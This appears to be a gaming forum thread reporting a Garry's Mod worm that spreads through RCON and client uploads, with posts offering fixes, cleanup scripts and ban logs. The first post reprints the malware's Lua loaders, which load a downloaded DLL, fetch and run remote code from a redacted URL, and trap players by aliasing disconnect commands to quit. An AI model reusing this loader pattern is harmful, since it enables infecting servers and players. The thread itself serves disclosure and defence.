1. Post #1
    Gold Member
    LennyPenny's Avatar
    December 2011
    1,145 Posts
    10 minutes a ago friend contacted me about his steam being spammed with messages like "fix it vinh" to all of his steam friends after joining a server. (here's the chatlog http://puu.sh/8ej4h.txt)

    When bringing it up to Dingusnin he told me that there was a thread made about this 5min ago, but after I had a look it at it got deleted because it contained the code to spread the virus. We managed to save the virus code, but we can't spread it right here since the thread would get deleted again.

    Here is a censored version of the original post.

    Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies that go under the same name, or VIN, these include the files client_infect.lua, and server_infect.lua.


    Seems they do this through client uploads.

    Not 100% sure, but it seems they Hack into RCON (They can get your RCON password through clientside lua, even with client uploads disabled), put some files on there, then they use some other fancy doodads to infect the server and clients more.

    Some of their code leaked into our console, so here's what I found, make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:


    Here's the server_infect.lua
    -- Loaded over HTTP by Lua through CompileString(...)() via rcon request
    if not system.IsWindows() then
    	return
    end
    
    if file.Exists("lua/autorun/server/default.lua", "MOD") then
    	return -- Already infected
    end
    
    timer.Create("infchk", 2, 0, function()
    	if file.Exists("download/engine_win32.dll", "MOD") then
    		timer.Remove("infchk")
    
    		require("/../../../download/engine")
    
    		http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
    			CreateFile("garrysmod/lua/autorun/server/default.lua", content)
    
    			include("autorun/server/default.lua")
    		end, function() end)
    	end
    end)
    


    Here's the client_infect.lua
    -- Loaded over HTTP by Lua through client:SendLua(..)
    if not system.IsWindows() then
    	return
    end
     
    if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
    	return -- Already infected
    end
     
     
    timer.Create("infchk", 2, 0, function()
    	if file.Exists("download/engine_win32.dll", "MOD") then
    		timer.Remove("infchk")
     
    		require("/../../../download/engine")
     
     
    		http.Fetch("SAME HERE", function(content)
    			CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
    			CreateFile("garrysmod/materials/cooltexture.vtf", content)
    			
    			local ret = CompileString( content, "l", false )
    			pcall(ret)
     
    			timer.Simple(4, function()
    				ConCommand("alias disconnect quit\n")
    				ConCommand("alias gamemenucommand quit\n")
    				ConCommand("alias retry quit\n")
    				ConCommand("alias connect quit\n")
    				ConCommand("alias map quit\n")
    			end)
    		end)
    	end
    end)
    

    Hey Garry, or Valve, maybe you can find some ways to fix this a bit?


    Thanks, and VINH'LL FIX IT@@.
    Edited:

    If someone important needs the critical code, we will supply it.
    Reply With Quote Edit / Delete Show Events Informative x 15Lua Helper x 6Winner x 5Funny x 5Useful x 2Friendly x 1Optimistic x 1Agree x 1 (list)

  2. Post #2
    I'm Better Than You
    Dennab
    August 2008
    5,414 Posts
    i'm sure vinh'll fix it

    Edited:

    the patch code has already been written, vinh's already fixed it!
    Reply With Quote Edit / Delete United Kingdom Show Events Agree x 15Funny x 10Winner x 2Dumb x 2Disagree x 1 (list)

  3. Post #3
    Author of the detected GMod Cheat cheat Oubhack

    January 2012
    634 Posts
    i'm sure vinh'll fix it
    you gonna get swebony to delete this thread too or what?
    Reply With Quote Edit / Delete Windows 7 Ireland Show Events Dumb Dumb x 10Zing Zing x 1Funny Funny x 1 (list)

  4. Post #4
    Gold Member
    The freeman's Avatar
    October 2007
    6,504 Posts
    you gonna get swebony to delete this thread too or what?
    Why would a mod abuse powers just because? It's free money.
    Reply With Quote Edit / Delete Windows 8 United States Show Events Dumb Dumb x 2Optimistic Optimistic x 1 (list)

  5. Post #5
    I am a moderator.
    Swebonny's Avatar
    August 2006
    13,007 Posts
    you gonna get swebony to delete this thread too or what?
    That other thread got some parts that I assume could easily be abused by people, so I quickly deleted it. However I forwarded it to garry/the other moderators, so they'll be able to take a closer look at it.

    The OP of this thread removed those parts, so I'll let this one stay.
    Reply With Quote Edit / Delete Windows 7 Sweden Show Events Friendly x 19Winner x 2Useful x 1Disagree x 1Dumb x 1 (list)

  6. Post #6
    Author of the detected GMod Cheat cheat Oubhack

    January 2012
    634 Posts
    Why would a mod abuse powers just because? It's free money.
    Swebonny deleted the thread Chrisaster and Friends: Infecting Servers and Clients! in Developer Discussion with the reason Virus code
    Reply With Quote Edit / Delete Windows 7 Ireland Show Events Dumb Dumb x 24Agree Agree x 1Winner Winner x 1 (list)

  7. Post #7
    Gold Member
    The freeman's Avatar
    October 2007
    6,504 Posts
    Yeah and spreading a method of spreading viruses is a very very very very very very very very very very very very bad idea.
    Reply With Quote Edit / Delete Windows 8 United States Show Events Disagree Disagree x 7Agree Agree x 3 (list)

  8. Post #8
    Gold Member
    dingusnin's Avatar
    February 2010
    1,992 Posts
    Quick untested fix that servers should send to the clients.

    Code:
    local BannedFunctions = {
    	'CreateFile',
    	'SendFile',
    	'SWJoinGroupChat',
    	'DeleteFile',
    	'RequestFile'}
    	
    function ClearFEnv( )
    
    	local environment = getfenv()
    	for k,v in pairs( environment ) do
    		if table.HasValue( BannedFunctions , k ) then
    			v = nil
    		else
    			continue
    		end
    	end
    	
    	setfenv( {
    			__index = environment,
    			__newindex = function(self, k, v)
    				rawset(environment, k, v)
    			end
    		})
    	
    end
    
    ClearFEnv( )
    Again, untested. I have my suspensions on how it works, but I will be able to test it in the morning. If you guys need a download link, either go on infected servers or PM me, I will get back to you soon.
    Reply With Quote Edit / Delete France Show Events Disagree Disagree x 9Dumb Dumb x 2Optimistic Optimistic x 1Useful Useful x 1 (list)

  9. Post #9
    me
    jackool's Avatar
    June 2005
    616 Posts
    Yeah this is for sure affecting lots of people. I've been spammed with "FIX IT VINH" by at least 4 people today.
    Reply With Quote Edit / Delete Windows 7 Show Events Funny Funny x 4 (list)

  10. Post #10
    Gold Member
    LennyPenny's Avatar
    December 2011
    1,145 Posts
    I'm pretty upset right now, there was another "virus exploit" like this a few months ago.
    Imagine someone like the owner of the tdmcars workshop addon (just an example) quickly patching this (with a more serious payload) in, hitting thousands of people and then just patching it out again and going unnoticed.
    Reply With Quote Edit / Delete Germany Show Events Dumb Dumb x 7Disagree Disagree x 1Agree Agree x 1 (list)

  11. Post #11
    ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
    zerothefallen's Avatar
    March 2010
    8,113 Posts
    I'm pretty upset right now, there was another "virus exploit" like this a few months ago.
    Imagine someone like the owner of the tdmcars workshop addon (just an example) quickly patching this (with a more serious payload) in, hitting thousands of people and then just patching it out again and going unnoticed.
    are you stupid or what

    it's like you dont understand that this is a sandbox game, no flying fuck exploits are going to hit.



    do you actually expect it to never happen?
    Reply With Quote Edit / Delete United States Show Events Dumb Dumb x 19Funny Funny x 1Optimistic Optimistic x 1Agree Agree x 1 (list)

  12. Post #12
    I'm Better Than You
    Dennab
    August 2008
    5,414 Posts
    Again, untested. I have my suspensions on how it works, but I will be able to test it in the morning. If you guys need a download link, either go on infected servers or PM me, I will get back to you soon.
    if GetTimeStamp() < (1397865590 + (60 * 60 * 12)) then return end
    ...
    DeleteFile("garrysmod/materials/cooltexture.vtf")

    looks like it cleans up after itself in about 10 hours time

    Like I said before vinh already has code to patch this, it'll be pushed out asap.
    Reply With Quote Edit / Delete United Kingdom Show Events Agree Agree x 2Dumb Dumb x 1 (list)

  13. Post #13
    nettsam's Avatar
    May 2013
    304 Posts
    [SPOILER]
    nettsam,
    Handsome Matt,
    !cake,
    Rockeiro123,
    FoohyAB,
    Jeezy,
    Kingbob387,
    Willox,
    The freeman,
    code_gs,
    zerothefallen,
    munch,
    GamingRobot32,
    toaster468,
    Grimreaperx1,
    Bumrang,
    Alex_grist,
    >>oubliette<<,
    dingusnin,
    Rohans,
    jamie1130,
    jackool,
    Ott,
    awcmon,
    Berkin,
    MattTheSpy,
    Leystryku,
    farmatyr,
    bean_xp

    (32 guests)
    [/SPOILER]

    nice
    Reply With Quote Edit / Delete United States Show Events Dumb Dumb x 31Useful Useful x 1Informative Informative x 1 (list)

  14. Post #14
    Gold Member
    The freeman's Avatar
    October 2007
    6,504 Posts
    nettsam,
    Handsome Matt,
    !cake,
    Rockeiro123,
    FoohyAB,
    Jeezy,
    Kingbob387,
    Willox,
    The freeman,
    code_gs,
    zerothefallen,
    munch,
    GamingRobot32,
    toaster468,
    Grimreaperx1,
    Bumrang,
    Alex_grist,
    >>oubliette<<,
    dingusnin,
    Rohans,
    jamie1130,
    jackool,
    Ott,
    awcmon,
    Berkin,
    MattTheSpy,
    Leystryku,
    farmatyr,
    bean_xp

    (32 guests)

    nice
    How is this relevant
    Reply With Quote Edit / Delete Windows 8 United States Show Events Agree Agree x 10Dumb Dumb x 2 (list)

  15. Post #15
    Gold Member
    toaster468's Avatar
    January 2010
    3,227 Posts
    sup
    Reply With Quote Edit / Delete United States Show Events Late x 3Dumb x 3Informative x 2Funny x 1Agree x 1Useful x 1 (list)

  16. Post #16
    I'm Better Than You
    Dennab
    August 2008
    5,414 Posts
    How is this relevant
    they're the perpetrators duh.
    Reply With Quote Edit / Delete United Kingdom Show Events Funny Funny x 21Dumb Dumb x 1 (list)

  17. Post #17
    Gold Member
    Rohans's Avatar
    September 2010
    166 Posts
    ready to get b&??
    Reply With Quote Edit / Delete Canada Show Events Agree Agree x 7Funny Funny x 2 (list)

  18. Post #18
    Gold Member
    !cake's Avatar
    January 2010
    81 Posts
    I managed to get hold of the entirety of the lua part of the virus (won't say how, but it involved zero risk of infection and would make you laugh).

    As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    It'd be interesting to see wtf that module does to coerce servers to send .cfg files to clients and convince clients + servers to accept .dll uploads / downloads.

    Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.
    Reply With Quote Edit / Delete United Kingdom Show Events Agree Agree x 3Disagree Disagree x 1Artistic Artistic x 1 (list)

  19. Post #19
    I'm Better Than You
    Dennab
    August 2008
    5,414 Posts
    Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.
    Just sv_allowdownload 0 and sv_allowupload 0, otherwise you can still have any file or any file uploaded.
    Reply With Quote Edit / Delete United Kingdom Show Events Informative Informative x 2Useful Useful x 1 (list)

  20. Post #20
    Gold Member
    LennyPenny's Avatar
    December 2011
    1,145 Posts
    As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    We managed to get the infected dll from the friend that contacted me. I'm pretty sure we can release it once the update is out so everyone can have their own look at it. Dingusnin already managed to reverse some key parts.
    Reply With Quote Edit / Delete Germany Show Events Winner Winner x 3 (list)

  21. Post #21
    Gold Member
    The freeman's Avatar
    October 2007
    6,504 Posts
    I managed to get hold of the entirety of the lua part of the virus (won't say how, but it involved zero risk of infection and would make you laugh).

    As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    It'd be interesting to see wtf that module does to coerce servers to send .cfg files to clients and convince clients + servers to accept .dll uploads / downloads.

    Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.
    The hack could ~probably~ be engineered to download all .cfg files in a server's directory and search them for the rcon password. Surely there aren't alot of .cfg files in a regular server anyhow.
    Reply With Quote Edit / Delete Windows 8 United States Show Events

  22. Post #22
    Dennab
    January 2008
    121 Posts
    Made this batch file to remove all traces of this exploit.

    Run from the "garrysmod" folder on either the client or server.

    Code:
    @echo off
    title Exploit file cleanup - MFSiNC
    
    if exist "hl2.exe" (
    	cd "garrysmod"
    )
    
    if not exist steam.inf (
    	echo.
    	echo You're running this from the wrong place!
    	echo.
    	echo Put this file in your garrysmod folder, either server or client, and re-run it.
    	echo.
    	echo.
    	pause
    	exit
    )
    
    echo.
    echo This will remove the files used in the exploit/virus.
    echo.
    echo To see exactly what will be removed, open this batch file with Notepad.
    echo.
    pause
    
    echo Cleaning..
    
    taskkill /F /IM hl2.exe > nul
    taskkill /F /IM srcds.exe > nul
    
    
    
    ::Files, clientside
    if exist "engine_win32.dll" (
    	attrib -h "engine_win32.dll"
    	del /F /Q "engine_win32.dll"	
    )
    
    if exist "materials\cooltexture.vtf" (
    	del /F /Q "materials\cooltexture.vtf"
    )
    
    if exist "bin\game_shader_generic_engine.dll" (
    	attrib -h "bin\game_shader_generic_engine.dll"
    	del /F /Q "bin\game_shader_generic_engine.dll"
    )
    
    if exist "download\engine_win32.dll" (
    	attrib -h "download\engine_win32.dll"
    	del /F /Q "download\engine_win32.dll"
    )
    
    ::Dir
    if exist "download\cfg" (
    	RD /S /Q "download\cfg"
    )
    
    
    
    ::Files, serverside
    if exist "lua\autorun\server\default.lua" (
    	attrib -h "lua\autorun\server\default.lua"
    	del /F /Q "lua\autorun\server\default.lua"
    )
    
    
    
    echo.
    echo Done.
    echo.
    pause
    Garry: Remove these files at the next GMod update.
    Reply With Quote Edit / Delete United Kingdom Show Events Friendly x 17Useful x 3Winner x 3Funny x 2Agree x 2Lua King x 2Informative x 2Optimistic x 1 (list)

  23. Post #23
    -snip-
    code_gs's Avatar
    March 2013
    10,419 Posts
    Also, for the love of god, stop using sv_allowupload. It has major exploits in many Source games.
    Reply With Quote Edit / Delete United States Show Events Agree Agree x 6Optimistic Optimistic x 1Winner Winner x 1Informative Informative x 1 (list)

  24. Post #24
    Abdul's Avatar
    July 2012
    96 Posts
    Also, for the love of god, stop using sv_allowupload. It has major exploits in many Source games.
    Isn't this needed for sprays to work?
    Reply With Quote Edit / Delete United Kingdom Show Events Agree Agree x 14 (list)

  25. Post #25
    ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
    zerothefallen's Avatar
    March 2010
    8,113 Posts
    Isn't this needed for sprays to work?
    yup
    Reply With Quote Edit / Delete United States Show Events Dumb Dumb x 6Informative Informative x 1Agree Agree x 1 (list)

  26. Post #26

    April 2014
    3 Posts
    Thanks for reposting my thread that got deleted.

    Infected clients with engine_win32.dll in download folder are acquiring server RCON's and running a command that infects the server, which then infects every other client on the server.


    These guys are literally acquiring everyone's RCON passwords, and are probably going to do more with it in the future if it's not fixed.

    By the way, if you disable your servers RCON, an infected client that joins will somehow turn RCON back on and set it to derphurp or some shit like that.
    Reply With Quote Edit / Delete Windows 7 United States Show Events Lua King x 4Informative x 2Dumb x 2Disagree x 2Late x 1 (list)

  27. Post #27
    -snip-
    code_gs's Avatar
    March 2013
    10,419 Posts
    Not in all cases. Some guy told me he got sprays working with sv_allowdownload.
    Reply With Quote Edit / Delete United States Show Events Dumb Dumb x 3 (list)

  28. Post #28
    ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
    zerothefallen's Avatar
    March 2010
    8,113 Posts
    (Console) banned Itami permanently (Detected foreign source file l.)
    [18:55:36] Dropped "Itami" from server<STEAM_0:0:55206120>
    [18:55:36] (Console) banned cunt permanently (Detected foreign source file l.)
    [18:55:36] Dropped "cunt" from server<STEAM_0:0:47477632>
    [18:55:37] (Console) banned liteops1 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "liteops1" from server<STEAM_0:1:70544069>
    [18:55:37] (Console) banned DragonFire245 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "DragonFire245" from server<STEAM_0:1:52868695>
    [18:55:39] (Console) banned APinkFlamingo permanently (Detected foreign source file l.)
    [18:55:39] Dropped "APinkFlamingo" from server<STEAM_0:0:45115099>


    I find this hilarious, qac doesnt like it and is mass banning almost everyone from every server that has a copy


    best ac


    edit: oh god im getting so many messages

    at least 450 infected people banned hahahahaha
    Reply With Quote Edit / Delete United States Show Events Funny Funny x 39Winner Winner x 2Zing Zing x 1 (list)

  29. Post #29

    April 2014
    3 Posts
    EDIT: Sorry double post
    Reply With Quote Edit / Delete Windows 7 United States Show Events Informative Informative x 2 (list)

  30. Post #30
    ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
    zerothefallen's Avatar
    March 2010
    8,113 Posts
    Not in all cases. Some guy told me he got sprays working with sv_allowdownload.
    then he most likely isnt using valve's own spray thing. could always use a lua spray thing
    Reply With Quote Edit / Delete United States Show Events Agree Agree x 4 (list)

  31. Post #31
    nettsam's Avatar
    May 2013
    304 Posts
    (Console) banned Itami permanently (Detected foreign source file l.)
    [18:55:36] Dropped "Itami" from server<STEAM_0:0:55206120>
    [18:55:36] (Console) banned cunt permanently (Detected foreign source file l.)
    [18:55:36] Dropped "cunt" from server<STEAM_0:0:47477632>
    [18:55:37] (Console) banned liteops1 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "liteops1" from server<STEAM_0:1:70544069>
    [18:55:37] (Console) banned DragonFire245 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "DragonFire245" from server<STEAM_0:1:52868695>
    [18:55:39] (Console) banned APinkFlamingo permanently (Detected foreign source file l.)
    [18:55:39] Dropped "APinkFlamingo" from server<STEAM_0:0:45115099>


    I find this hilarious, qac doesnt like it and is mass banning almost everyone from every server that has a copy


    best ac


    edit: oh god im getting so many messages

    at least 450 infected people banned hahahahaha
    once i got perma'd for having this

    Reply With Quote Edit / Delete United States Show Events Informative Informative x 1 (list)

  32. Post #32
    ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽ ﷽
    zerothefallen's Avatar
    March 2010
    8,113 Posts
    once i got perma'd for having this

    my code is racist.
    Reply With Quote Edit / Delete United States Show Events

  33. Post #33
    Not in all cases. Some guy told me he got sprays working with sv_allowdownload.
    It's sv_allowupload which controls sprays, not download.
    Reply With Quote Edit / Delete United Kingdom Show Events Informative Informative x 4Agree Agree x 2 (list)

  34. Post #34

    April 2014
    3 Posts
    That other thread got some parts that I assume could easily be abused by people, so I quickly deleted it. However I forwarded it to garry/the other moderators, so they'll be able to take a closer look at it.

    The OP of this thread removed those parts, so I'll let this one stay.
    I just read this, I understand you removed it for a reason like that. Hopefully there's some way these exploits can be patched over.

    I wanted someone in Facepunch to realize this is happening.
    Reply With Quote Edit / Delete United States Show Events Friendly Friendly x 2 (list)

  35. Post #35
    Gold Member
    !cake's Avatar
    January 2010
    81 Posts
    Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==
    Reply With Quote Edit / Delete United Kingdom Show Events Winner Winner x 16Funny Funny x 2Late Late x 1 (list)

  36. Post #36
    I paid $1 and all got was an STD
    Zombie man70's Avatar
    October 2007
    1,778 Posts
    5056 guests holy shit. This thing must of hit hard.
    Reply With Quote Edit / Delete United States Show Events Dumb Dumb x 3Funny Funny x 3Agree Agree x 1 (list)

  37. Post #37
    nettsam's Avatar
    May 2013
    304 Posts
    Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==
    thats awesome, thanks for link
    Reply With Quote Edit / Delete United States Show Events Friendly Friendly x 1 (list)

  38. Post #38
    I'm Better Than You
    Dennab
    August 2008
    5,414 Posts
    Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==
    This executes when a player joins a server and only then, so I don't think this accounts for every infected client.
    Reply With Quote Edit / Delete United Kingdom Show Events Agree Agree x 1Dumb Dumb x 1Zing Zing x 1 (list)

  39. Post #39
    I'll RUB MY TALENT OUT ALL OVER YOU
    KennyAwsum's Avatar
    November 2011
    4,484 Posts

    oh god
    Reply With Quote Edit / Delete United Kingdom Show Events Funny Funny x 40Artistic Artistic x 1 (list)

  40. Post #40
    Creep
    seano12's Avatar
    July 2006
    10,542 Posts
    I've never seen so many guests before.
    Reply With Quote Edit / Delete United States Show Events Agree Agree x 3Disagree Disagree x 1Informative Informative x 1 (list)